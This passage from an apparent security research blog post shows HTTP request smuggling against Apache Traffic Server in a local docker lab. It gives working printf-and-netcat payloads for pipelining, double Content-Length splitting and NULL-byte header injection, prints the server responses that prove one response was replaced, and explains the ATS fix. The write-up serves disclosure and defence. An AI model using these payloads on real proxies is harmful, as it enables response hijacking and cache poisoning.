&lt;span class=&quot;s1&quot;&gt;&amp;#39;\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;p&quot;&gt;|&lt;/span&gt; nc 127.0.0.1 8001

&lt;span class=&quot;nb&quot;&gt;printf&lt;/span&gt; &lt;span class=&quot;s1&quot;&gt;&amp;#39;GET / HTTP/1.1\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;Host:dummy-host6.example.com\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;p&quot;&gt;|&lt;/span&gt; nc 127.0.0.1 8001&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;


&lt;p&gt;And now let&#39;s start a more complex HTTP stuff, we will make an &lt;strong&gt;HTTP pipeline&lt;/strong&gt;, pipelining several queries and receiving several responses, as pipelining is the &lt;strong&gt;root&lt;/strong&gt; of most smuggling attacks:&lt;/p&gt;

&lt;div class=&quot;highlight&quot;&gt;&lt;pre&gt;&lt;code class=&quot;language-bash&quot; data-lang=&quot;bash&quot;&gt;&lt;span class=&quot;c&quot;&gt;# send one pipelined chain of queries&lt;/span&gt;
&lt;span class=&quot;nb&quot;&gt;printf&lt;/span&gt; &lt;span class=&quot;s1&quot;&gt;&amp;#39;GET /?cache=1 HTTP/1.1\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;Host:dummy-host7.example.com\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;GET /?cache=2 HTTP/1.1\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;Host:dummy-host7.example.com\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;GET /?cache=3 HTTP/1.1\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;Host:dummy-host6.example.com\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;GET /?cache=4 HTTP/1.1\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;Host:dummy-host6.example.com\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;p&quot;&gt;|&lt;/span&gt; nc 127.0.0.1 8001&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;


&lt;p&gt;This is &lt;strong&gt;pipelining&lt;/strong&gt;, it&#39;s not only using &lt;strong&gt;HTTP keepAlive&lt;/strong&gt;, because we send the chain of queries without waiting for the responses. See &lt;a href=&quot;https://regilero.github.io/security/english/2015/10/04/http_smuggling_in_2015_part_one/#toc4&quot;&gt;my previous post&lt;/a&gt; for detail on Keepalives and Pipelining.&lt;/p&gt;

&lt;p&gt;You should get the &lt;strong&gt;Nginx access log&lt;/strong&gt; on the docker-compose output, if you do not &lt;strong&gt;rotate some arguments&lt;/strong&gt; in the query nginx wont get reached by your requests, because ATS is caching the result already (&lt;code&gt;CTRL+C&lt;/code&gt; on the docker-compose output and &lt;code&gt;docker-compose up&lt;/code&gt; will remove any cache).&lt;/p&gt;

&lt;h2&gt;Request Splitting by Double Content-Length&lt;/h2&gt;

&lt;p&gt;Let&#39;s start a real play. That&#39;s the 101 of HTTP Smuggling. The &lt;em&gt;easy&lt;/em&gt; vector. &lt;strong&gt;Double Content-Length header support is strictly forbidden&lt;/strong&gt; by the &lt;a href=&quot;https://tools.ietf.org/html/rfc7230#section-3.3.3&quot;&gt;RFC 7230 3.3.3&lt;/a&gt; (bold added):&lt;/p&gt;

&lt;blockquote&gt;&lt;p&gt;&lt;strong&gt;4&lt;/strong&gt; If a message is received without Transfer-Encoding and with
   either &lt;strong&gt;multiple Content-Length header fields having differing
   field-values&lt;/strong&gt; or a single Content-Length header field having an
   invalid value, then the message framing is invalid and the
   recipient &lt;strong&gt;MUST treat it as an unrecoverable error&lt;/strong&gt;. If this is
   a request message, the server MUST respond with a 400 (Bad Request)
   status code and then close the connection.  If this is a response
   message received by a proxy, the proxy MUST close the connection
   to the server, discard the received response, and send a 502 (Bad
   Gateway) response to the client.  If this is a response message
   received by a user agent, the user agent MUST close the
   connection to the server and discard the received response.&lt;/p&gt;&lt;/blockquote&gt;

&lt;p&gt;Differing interpretations of message length based on the order of Content-Length headers were the first demonstrated HTTP smuggling attacks (2005).&lt;/p&gt;

&lt;p&gt;Sending such query directly on ATS generates 2 responses (one 400 and one 200):&lt;/p&gt;

&lt;div class=&quot;highlight&quot;&gt;&lt;pre&gt;&lt;code class=&quot;language-bash&quot; data-lang=&quot;bash&quot;&gt;&lt;span class=&quot;nb&quot;&gt;printf&lt;/span&gt; &lt;span class=&quot;s1&quot;&gt;&amp;#39;GET /index.html?toto=1 HTTP/1.1\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;Host: dummy-host7.example.com\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;Content-Length: 0\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;Content-Length: 66\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;GET /index.html?toto=2 HTTP/1.1\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;Host: dummy-host7.example.com\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;p&quot;&gt;|&lt;/span&gt;nc -q &lt;span class=&quot;m&quot;&gt;1&lt;/span&gt; 127.0.0.1 8007&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;


&lt;p&gt;The regular response should be one error 400.&lt;/p&gt;

&lt;p&gt;Using port 8001 (HaProxy) would not work, HaProxy is a robust HTTP agent and cannot be fooled by such an easy trick.&lt;/p&gt;

&lt;p&gt;This is &lt;strong&gt;Critical&lt;/strong&gt; Request Splitting, classical, but hard to reproduce in real life environment if some robust tools are used on the reverse proxy chain. So, &lt;strong&gt;why critical?&lt;/strong&gt; Because you could also consider ATS to be robust, and use a new unknown HTTP server behind or in front of ATS and expect such smuggling attacks to be properly detected.&lt;/p&gt;

&lt;p&gt;And there is another factor of criticality, any other issue on HTTP parsing can exploit this Double Content-Length. Let&#39;s say you have another issue which allows you to hide one header for all other HTTP actors, but reveals this header to ATS. Then you just have to use this hidden header for a second Content-length and you&#39;re done, without being blocked by a previous actor. On our current case, ATS, you have one example of such hidden-header issue with the &#39;space-before-:&#39; that we will analyze later.&lt;/p&gt;

&lt;h2&gt;Request Splitting by NULL Character Injection&lt;/h2&gt;

&lt;p&gt;This example is not the easiest one to understand (go to the next one if you do not get it, or even the one after), that&#39;s also not the biggest impact, as we will use a really bad query to attack, easily detected. But I love the magical &lt;strong&gt;NULL&lt;/strong&gt; (&lt;code&gt;\0&lt;/code&gt;) character.&lt;/p&gt;

&lt;p&gt;Using a NULL byte character in a header triggers a query rejection on ATS, that&#39;s ok, but also a &lt;strong&gt;premature end of query&lt;/strong&gt;, and if you do not close pipelines after a first error, bad things could happen. Next line is interpreted as next query in pipeline.&lt;/p&gt;

&lt;p&gt;So, a valid (almost, if you except the NULL character) pipeline like this one:&lt;/p&gt;

&lt;pre&gt;&lt;code&gt; 01 GET /does-not-exists.html?foofoo=1 HTTP/1.1\r\n
 02 X-Something: \0 something\r\n
 03 X-Foo: Bar\r\n
 04 \r\n
 05 GET /index.html?bar=1 HTTP/1.1\r\n
 06 Host: dummy-host7.example.com\r\n
 07 \r\n
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;Generates 2 error 400. because the second query is starting with &lt;code&gt;X-Foo: Bar\r\n&lt;/code&gt; and that&#39;s
an invalid first query line.&lt;/p&gt;

&lt;p&gt;Let&#39;s test an invalid pipeline (as there&#39;is no &lt;code&gt;\r\n&lt;/code&gt; between the 2 queries):&lt;/p&gt;

&lt;pre&gt;&lt;code&gt; 01 GET /does-not-exists.html?foofoo=2 HTTP/1.1\r\n
 02 X-Something: \0 something\r\n
 03 GET /index.html?bar=2 HTTP/1.1\r\n
 04 Host: dummy-host7.example.com\r\n
 05 \r\n
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;It generates 1 error 400 and one 200 OK response. Lines &lt;strong&gt;03/04/05&lt;/strong&gt; are taken as a valid query.&lt;/p&gt;

&lt;p&gt;This is already an HTTP request Splitting attack.&lt;/p&gt;

&lt;p&gt;But line &lt;strong&gt;03&lt;/strong&gt; is a really bad header line that most agent would reject. You cannot read that as a valid unique query. The fake pipeline would be detected early as a bad query, I mean line 03 is clearly not a valid header line.&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;GET /index.html?bar=2 HTTP/1.1\r\n
 !=
&amp;lt;HEADER-NAME-NO-SPACE&amp;gt;[:][SP]&amp;lt;HEADER-VALUE&amp;gt;[CR][LF]
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;For the first line the syntax is one of these two lines:&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;&amp;lt;METHOD&amp;gt;[SP]&amp;lt;LOCATION&amp;gt;[SP]HTTP/[M].[m][CR][LF]
&amp;lt;METHOD&amp;gt;[SP]&amp;lt;http[s]://LOCATION&amp;gt;[SP]HTTP/[M].[m][CR][LF] (absolute uri)
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;&lt;code&gt;LOCATION&lt;/code&gt; may be used to inject the special &lt;code&gt;[:]&lt;/code&gt; that is required in an header line, especially on the query string part,
but this would inject a lot of bad characters in the &lt;code&gt;HEADER-NAME-NO-SPACE&lt;/code&gt; part, like &#39;/&#39; or &#39;?&#39;.&lt;/p&gt;

&lt;p&gt;Let&#39;s try with the ABSOLUTE-URI alternative syntax, where the &lt;code&gt;[:]&lt;/code&gt; comes faster on the line, and the only bad character for an Header name would be the space. This will also fix the potential presence of the double Host header (absolute uri does replace the Host header).&lt;/p&gt;

&lt;pre&gt;&lt;code&gt; 01 GET /does-not-exists.html?foofoo=2 HTTP/1.1\r\n
 02 Host: dummy-host7.example.com\r\n
 03 X-Something: \0 something\r\n
 04 GET http://dummy-host7.example.com/index.html?bar=2 HTTP/1.1\r\n
 05 \r\n
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;Here the bad header which becomes a query is line &lt;strong&gt;04&lt;/strong&gt;, and the &lt;strong&gt;header name&lt;/strong&gt; is &lt;code&gt;GET http&lt;/code&gt; with an header value of &lt;code&gt;//dummy-host7.example.com/index.html?bar=2 HTTP/1.1&lt;/code&gt;. That&#39;s still an invalid header (the header name contains a space) but I&#39;m pretty sure we could find some HTTP agent transferring this header (ATS is one proof of that, space character in header names were allowed).&lt;/p&gt;

&lt;p&gt;A real attack using this trick will looks like this:&lt;/p&gt;

&lt;div class=&quot;highlight&quot;&gt;&lt;pre&gt;&lt;code class=&quot;language-bash&quot; data-lang=&quot;bash&quot;&gt;&lt;span class=&quot;nb&quot;&gt;printf&lt;/span&gt; &lt;span class=&quot;s1&quot;&gt;&amp;#39;GET /something.html?zorg=1 HTTP/1.1\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;Host: dummy-host7.example.com\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;X-Something: &amp;quot;\0something&amp;quot;\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;GET http://dummy-host7.example.com/index.html?replacing=1&amp;amp;zorg=2 HTTP/1.1\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;GET /targeted.html?replaced=maybe&amp;amp;zorg=3 HTTP/1.1\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;Host: dummy-host7.example.com\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;p&quot;&gt;|&lt;/span&gt;nc -q &lt;span class=&quot;m&quot;&gt;1&lt;/span&gt; 127.0.0.1 8007&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;


&lt;p&gt;This is just &lt;strong&gt;2 queries&lt;/strong&gt; (1st one has 2 bad header, one with a NULL, one with a space in header name), for ATS it&#39;s &lt;strong&gt;3 queries&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;The regular second one (&lt;code&gt;/targeted.html&lt;/code&gt;) -- third for ATS --  will get the response of the hidden query (&lt;code&gt;http://dummy-host.example.com/index.html?replacing=1&amp;amp;zorg=2&lt;/code&gt;). Check the &lt;code&gt;X-Location-echo:&lt;/code&gt; added by Nginx. After that ATS adds a thirsr response, a 404, but the previous actor expects only 2 responses, and the second response &lt;strong&gt;is already replaced&lt;/strong&gt;.&lt;/p&gt;

&lt;div class=&quot;highlight&quot;&gt;&lt;pre&gt;&lt;code class=&quot;language-http&quot; data-lang=&quot;http&quot;&gt;&lt;span class=&quot;kr&quot;&gt;HTTP&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;m&quot;&gt;1.1&lt;/span&gt; &lt;span class=&quot;m&quot;&gt;400&lt;/span&gt; &lt;span class=&quot;ne&quot;&gt;Invalid HTTP Request&lt;/span&gt;
&lt;span class=&quot;na&quot;&gt;Date&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;l&quot;&gt;Fri, 26 Oct 2018 15:34:53 GMT&lt;/span&gt;
&lt;span class=&quot;na&quot;&gt;Connection&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;l&quot;&gt;keep-alive&lt;/span&gt;
&lt;span class=&quot;na&quot;&gt;Server&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;l&quot;&gt;ATS/7.1.1&lt;/span&gt;
&lt;span class=&quot;na&quot;&gt;Cache-Control&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;l&quot;&gt;no-store&lt;/span&gt;
&lt;span class=&quot;na&quot;&gt;Content-Type&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;l&quot;&gt;text/html&lt;/span&gt;
&lt;span class=&quot;na&quot;&gt;Content-Language&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;l&quot;&gt;en&lt;/span&gt;
&lt;span class=&quot;na&quot;&gt;Content-Length&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;l&quot;&gt;220&lt;/span&gt;

&lt;span class=&quot;nt&quot;&gt;&amp;lt;HTML&amp;gt;&lt;/span&gt;
&lt;span class=&quot;nt&quot;&gt;&amp;lt;HEAD&amp;gt;&lt;/span&gt;
&lt;span class=&quot;nt&quot;&gt;&amp;lt;TITLE&amp;gt;&lt;/span&gt;Bad Request&lt;span class=&quot;nt&quot;&gt;&amp;lt;/TITLE&amp;gt;&lt;/span&gt;
&lt;span class=&quot;nt&quot;&gt;&amp;lt;/HEAD&amp;gt;&lt;/span&gt;

&lt;span class=&quot;nt&quot;&gt;&amp;lt;BODY&lt;/span&gt; &lt;span class=&quot;na&quot;&gt;BGCOLOR=&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&amp;quot;white&amp;quot;&lt;/span&gt; &lt;span class=&quot;na&quot;&gt;FGCOLOR=&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&amp;quot;black&amp;quot;&lt;/span&gt;&lt;span class=&quot;nt&quot;&gt;&amp;gt;&lt;/span&gt;
&lt;span class=&quot;nt&quot;&gt;&amp;lt;H1&amp;gt;&lt;/span&gt;Bad Request&lt;span class=&quot;nt&quot;&gt;&amp;lt;/H1&amp;gt;&lt;/span&gt;
&lt;span class=&quot;nt&quot;&gt;&amp;lt;HR&amp;gt;&lt;/span&gt;

&lt;span class=&quot;nt&quot;&gt;&amp;lt;FONT&lt;/span&gt; &lt;span class=&quot;na&quot;&gt;FACE=&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&amp;quot;Helvetica,Arial&amp;quot;&lt;/span&gt;&lt;span class=&quot;nt&quot;&gt;&amp;gt;&amp;lt;B&amp;gt;&lt;/span&gt;
Description: Could not process this request. 
&lt;span class=&quot;nt&quot;&gt;&amp;lt;/B&amp;gt;&amp;lt;/FONT&amp;gt;&lt;/span&gt;
&lt;span class=&quot;nt&quot;&gt;&amp;lt;HR&amp;gt;&lt;/span&gt;
&lt;span class=&quot;nt&quot;&gt;&amp;lt;/BODY&amp;gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;


&lt;p&gt;Then:&lt;/p&gt;

&lt;div class=&quot;highlight&quot;&gt;&lt;pre&gt;&lt;code class=&quot;language-http&quot; data-lang=&quot;http&quot;&gt;&lt;span class=&quot;kr&quot;&gt;HTTP&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;m&quot;&gt;1.1&lt;/span&gt; &lt;span class=&quot;m&quot;&gt;200&lt;/span&gt; &lt;span class=&quot;ne&quot;&gt;OK&lt;/span&gt;
&lt;span class=&quot;na&quot;&gt;Server&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;l&quot;&gt;ATS/7.1.1&lt;/span&gt;
&lt;span class=&quot;na&quot;&gt;Date&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;l&quot;&gt;Fri, 26 Oct 2018 15:34:53 GMT&lt;/span&gt;
&lt;span class=&quot;na&quot;&gt;Content-Type&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;l&quot;&gt;text/html&lt;/span&gt;
&lt;span class=&quot;na&quot;&gt;Content-Length&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;l&quot;&gt;120&lt;/span&gt;
&lt;span class=&quot;na&quot;&gt;Last-Modified&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;l&quot;&gt;Fri, 26 Oct 2018 14:16:28 GMT&lt;/span&gt;
&lt;span class=&quot;na&quot;&gt;ETag&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;l&quot;&gt;&amp;quot;5bd321bc-78&amp;quot;&lt;/span&gt;
&lt;span class=&quot;na&quot;&gt;X-Location-echo&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;l&quot;&gt;/index.html?replacing=1&amp;amp;zorg=2&lt;/span&gt;
&lt;span class=&quot;na&quot;&gt;X-Default-VH&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;l&quot;&gt;0&lt;/span&gt;
&lt;span class=&quot;na&quot;&gt;Cache-Control&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;l&quot;&gt;public, max-age=300&lt;/span&gt;
&lt;span class=&quot;na&quot;&gt;Accept-Ranges&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;l&quot;&gt;bytes&lt;/span&gt;
&lt;span class=&quot;na&quot;&gt;Age&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;l&quot;&gt;0&lt;/span&gt;
&lt;span class=&quot;na&quot;&gt;Connection&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;l&quot;&gt;keep-alive&lt;/span&gt;

$&lt;span class=&quot;nt&quot;&gt;&amp;lt;html&amp;gt;&amp;lt;head&amp;gt;&amp;lt;title&amp;gt;&lt;/span&gt;Nginx default static page&lt;span class=&quot;nt&quot;&gt;&amp;lt;/title&amp;gt;&amp;lt;/head&amp;gt;&lt;/span&gt;
&lt;span class=&quot;nt&quot;&gt;&amp;lt;body&amp;gt;&amp;lt;h1&amp;gt;&lt;/span&gt;Hello World&lt;span class=&quot;nt&quot;&gt;&amp;lt;/h1&amp;gt;&lt;/span&gt;
&lt;span class=&quot;nt&quot;&gt;&amp;lt;p&amp;gt;&lt;/span&gt;It works!&lt;span class=&quot;nt&quot;&gt;&amp;lt;/p&amp;gt;&lt;/span&gt;
&lt;span class=&quot;nt&quot;&gt;&amp;lt;/body&amp;gt;&amp;lt;/html&amp;gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;


&lt;p&gt;And then the extra unused response:&lt;/p&gt;

&lt;div class=&quot;highlight&quot;&gt;&lt;pre&gt;&lt;code class=&quot;language-http&quot; data-lang=&quot;http&quot;&gt;&lt;span class=&quot;kr&quot;&gt;HTTP&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;m&quot;&gt;1.1&lt;/span&gt; &lt;span class=&quot;m&quot;&gt;404&lt;/span&gt; &lt;span class=&quot;ne&quot;&gt;Not Found&lt;/span&gt;
&lt;span class=&quot;na&quot;&gt;Server&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;l&quot;&gt;ATS/7.1.1&lt;/span&gt;
&lt;span class=&quot;na&quot;&gt;Date&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;l&quot;&gt;Fri, 26 Oct 2018 15:34:53 GMT&lt;/span&gt;
&lt;span class=&quot;na&quot;&gt;Content-Type&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;l&quot;&gt;text/html&lt;/span&gt;
&lt;span class=&quot;na&quot;&gt;Content-Length&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;l&quot;&gt;153&lt;/span&gt;
&lt;span class=&quot;na&quot;&gt;Age&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;l&quot;&gt;0&lt;/span&gt;
&lt;span class=&quot;na&quot;&gt;Connection&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;l&quot;&gt;keep-alive&lt;/span&gt;

&lt;span class=&quot;nt&quot;&gt;&amp;lt;html&amp;gt;&lt;/span&gt;
&lt;span class=&quot;nt&quot;&gt;&amp;lt;head&amp;gt;&amp;lt;title&amp;gt;&lt;/span&gt;404 Not Found&lt;span class=&quot;nt&quot;&gt;&amp;lt;/title&amp;gt;&amp;lt;/head&amp;gt;&lt;/span&gt;
&lt;span class=&quot;nt&quot;&gt;&amp;lt;body&amp;gt;&lt;/span&gt;
&lt;span class=&quot;nt&quot;&gt;&amp;lt;center&amp;gt;&amp;lt;h1&amp;gt;&lt;/span&gt;404 Not Found&lt;span class=&quot;nt&quot;&gt;&amp;lt;/h1&amp;gt;&amp;lt;/center&amp;gt;&lt;/span&gt;
&lt;span class=&quot;nt&quot;&gt;&amp;lt;hr&amp;gt;&amp;lt;center&amp;gt;&lt;/span&gt;nginx/1.15.5&lt;span class=&quot;nt&quot;&gt;&amp;lt;/center&amp;gt;&lt;/span&gt;
&lt;span class=&quot;nt&quot;&gt;&amp;lt;/body&amp;gt;&lt;/span&gt;
&lt;span class=&quot;nt&quot;&gt;&amp;lt;/html&amp;gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;


&lt;p&gt;If you try to use port 8001 (so transit via HaProxy) you will not get the expected attacking result. That attacking query is really too bad.&lt;/p&gt;

&lt;div class=&quot;highlight&quot;&gt;&lt;pre&gt;&lt;code class=&quot;language-http&quot; data-lang=&quot;http&quot;&gt;&lt;span class=&quot;kr&quot;&gt;HTTP&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;m&quot;&gt;1.0&lt;/span&gt; &lt;span class=&quot;m&quot;&gt;400&lt;/span&gt; &lt;span class=&quot;ne&quot;&gt;Bad request&lt;/span&gt;
&lt;span class=&quot;na&quot;&gt;Cache-Control&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;l&quot;&gt;no-cache&lt;/span&gt;
&lt;span class=&quot;na&quot;&gt;Connection&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;l&quot;&gt;close&lt;/span&gt;
&lt;span class=&quot;na&quot;&gt;Content-Type&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;l&quot;&gt;text/html&lt;/span&gt;

&lt;span class=&quot;nt&quot;&gt;&amp;lt;html&amp;gt;&amp;lt;body&amp;gt;&amp;lt;h1&amp;gt;&lt;/span&gt;400 Bad request&lt;span class=&quot;nt&quot;&gt;&amp;lt;/h1&amp;gt;&lt;/span&gt;
Your browser sent an invalid request.
&lt;span class=&quot;nt&quot;&gt;&amp;lt;/body&amp;gt;&amp;lt;/html&amp;gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;


&lt;p&gt;That&#39;s an HTTP request splitting attack, but real world usage may be hard to find.&lt;/p&gt;

&lt;p&gt;The fix on ATS is the &#39;close on error&#39;, when an error 400 is triggered the pipelined is stopped, the socket is closed after the error.&lt;/p&gt;

&lt;h2&gt;Request Splitting using Huge Header, Early End-Of-Query&lt;/h2&gt;

&lt;p&gt;This attack is almost the same as the previous one, but do not need the magical &lt;strong&gt;NULL&lt;/strong&gt; character to trigger the end-of-query event.&lt;/p&gt;

&lt;p&gt;By using headers with a size around &lt;strong&gt;65536 characters&lt;/strong&gt; we can trigger this event, and exploit it the same way than the with the NULL premature end of query.&lt;/p&gt;

&lt;p&gt;A note on printf huge header generation with &lt;code&gt;printf&lt;/code&gt;. Here I&#39;m generating a query with one header containing a lot of repeated characters (&lt;code&gt;=&lt;/code&gt; or &lt;code&gt;1&lt;/code&gt; for example):&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;X: ==============( 65 532 &#39;=&#39; )========================\r\n
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;You can use the &lt;code&gt;%ns&lt;/code&gt; form in printf to generate this, generating big number of spaces.&lt;/p&gt;

&lt;p&gt;But to do that we need to replace some special characters with tr and use &lt;code&gt;_&lt;/code&gt; instead of spaces in the original string:&lt;/p&gt;

